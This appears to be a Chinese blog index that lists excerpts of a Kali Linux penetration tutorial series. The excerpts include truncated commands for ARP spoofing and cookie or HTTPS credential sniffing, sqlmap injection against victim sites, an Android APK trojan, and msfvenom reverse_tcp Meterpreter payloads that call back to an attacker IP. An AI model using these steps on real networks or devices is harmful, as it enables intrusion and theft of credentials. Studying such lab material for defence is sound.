安全攻防之旅
文章平均质量分 56
随行之旅
这个作者很懒,什么都没留下…
展开
-
kali攻防第2章 内网称霸之渗透安卓系统
Kali内网称霸之渗透安卓系统 准备工具 1、准备一部实体android手机2、使用KALI系统 要用到强大的msf工具(metasplot) 流程步骤1、启动msf命令是msfconsole2、在安卓手机上安装一个自己生成的apk木马程序3、利用msf工具来远程连接Android系统 1)启动msf(注意这里是链接msf就行了不需要进原创 2015-11-24 16:35:16 · 19335 阅读 · 4 评论 -
kali攻防第13章 Metasploit之生成webshell及应用
Metasploit之生成webshell及应用 准备工具1、kali 系统 IP 10.10.10.1312、受害者机子 IP 10.10.10.1303、使用工具 Metasploit 步骤: 1、在msf生成asp脚本木马root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.原创 2015-12-24 12:13:21 · 6400 阅读 · 0 评论 -
kali攻防第12章 Metasploit之服务器蓝屏攻击
Metasploit之服务器蓝屏攻击 准备工具1、kali 系统 IP:10.10.10.1312、受害者机子 IP: 10.10.10.1303、工具 Metasploit4、服务器开启3389端口 步骤:1、进入Metasploit控制台root@kali:~# msfconsole原创 2015-12-24 09:52:23 · 14107 阅读 · 0 评论 -
kali攻防第7章补充 SQLMAP介绍之Cookie注入
SQLMAP介绍之Cookie注入 准备工具1、KALI 系统IP:10.10.10.1312、受害网站:原创 2015-12-03 18:22:19 · 1893 阅读 · 0 评论 -
kali攻防第7章 SQLMAP介绍之PHP网站渗透
SQLMAP介绍之PHP网站渗透 准备工具 1、KALI攻击系统IP :10.10.10.1312、受害网站:3、Sqlmap 入注工具 步骤:1、检测:Sqlmap -u “”2、sqlmap -u "" --is-dba3、sqlmap -u “” --dbs4、sqlmap -u “” --current-db5、sqlmap -原创 2015-12-01 17:18:59 · 3637 阅读 · 0 评论 -
kali攻防第8章 Metasploit新手知识扫盲
Metasploit新手知识扫盲1、启动metasploit使用命令msfconsole这里有1500个利用模块工具等内容。2、模块漏洞Cmd的模块都是操作系统类型,x86的模块都是系统应用平台模块,其他基于各个平台的漏洞模块(如:osx、solaris、windows等)3、进入模块命令 use exploit,如下进入smb的0807原创 2015-12-02 17:07:28 · 1418 阅读 · 1 评论 -
kali攻防第11章 攻击实例讲解-ms10_046快捷方式图标漏洞
攻击实例讲解-ms10_046快捷方式图标漏洞 准备工具1、kali系统 IP:10.10.10.1312、受害者机子 IP:10.10.10.1293、使用工具 msfconsole 步骤:1、进入控制台root@kali:~# msfconsole原创 2015-12-18 11:20:01 · 3490 阅读 · 0 评论 -
kali攻防第6章 SQLMAP介绍及ASP网站渗透
SQLMAP介绍及ASP网站渗透准备工具1、kali_linux系统 IP= 10.10.10.1313、Sqlpmap 入注工具 步骤:-u “检测是否存在注入”返回数据库的名字 2、3、4、 参数解释:1、user 根据经验 确定这是用户表2、--columns 猜列表名 根据u原创 2015-11-30 16:28:21 · 1892 阅读 · 0 评论 -
kali攻防第14章 SQLMAP之漏洞服务器
SQLMAP之漏洞服务器准备工具1、kali 系统IP 10.10.10.1312、受害网站3、使用工具sqlmap 步骤:1、登录受害网站网址设置为出现Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in E:\WWW\techdetai原创 2015-12-29 14:19:26 · 2736 阅读 · 0 评论 -
kali攻防第5章 内网称霸之HTTPS账号密码获取
内网称霸之HTTPS账号密码获取 准备工具1)KALI LINUX系统IP 10.10.10.1312)WINDOWS 系统 IP 10.10.10.1293)Arpspoof 嗅探工具4)Sslstrip https的链接5)ettercap抓包工具 步骤: 1、root@kali:~# arpspoof -i eth0 -t 10.10.原创 2015-11-27 10:55:57 · 10739 阅读 · 3 评论 -
kali攻防第10章 Burp Suite功能的简单介绍
Burp Suite功能简单介绍介绍:1、登录界面 2、Proxy功能通过拦截,查看和修改所有的请求和响应您的浏览器与目标Web服务器之间传递。 3、Using BurpProxy http、httpshttp设置代理的方法:以http ie为例:代理服务器填写地址127.0.0.1端口8080 4、这里端口可以随便定义但是要跟burp的监听端原创 2015-12-14 11:18:47 · 2124 阅读 · 0 评论 -
kali攻防第4章 内网称霸之HTTP信息截取
内网称霸之HTTP信息截取 准备工具1、攻击者:KALI-LINUX IP = 10.10.10.1312、受害者:windows IP=10.10.10.1293、arpspoof 欺骗工具4、Ettercap 抓包工具 步骤: 1、将kali_linux主机设置 root@kali:~# echo "1" > /proc/sys/net原创 2015-11-26 11:01:35 · 2566 阅读 · 0 评论 -
kali攻防第3章 内网称霸之Cookie截取
内网称霸之Cookie截取 准备工具 1、一台KALI_LINUX系统2、一台被攻击的windows系统 网络环境 Kali系统IP 10.10.10.131Windows xp IP 10.10.10.129 使用的工具 arpspoof -->欺骗工具 wireshark -->抓包工具 开始执行步骤原创 2015-11-25 17:15:31 · 9767 阅读 · 0 评论 -
kali攻防第1章 内网称霸之图片获取
内网称霸之图片获取这第1篇开讲 内网称霸之图片获取1、使用的工具是:arpspoof , driftnet 攻击者: 10.10.10.131 受害者:10.10.10.129网关: 默认网关. . . . . . . . . . . . . : 10.10.10.22、使用arpsoop工具arpspoo原创 2015-11-23 17:03:15 · 4166 阅读 · 0 评论 -
kali攻防第9章 Metasploit之我的远程控制软件
准备工具1、KALI系统 IP 10.10.10.1312、受害系统 IP 10.10.10.133 步骤:1、生成木马控制程序root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.10.10.131 LPORT=44原创 2015-12-07 15:45:26 · 11127 阅读 · 5 评论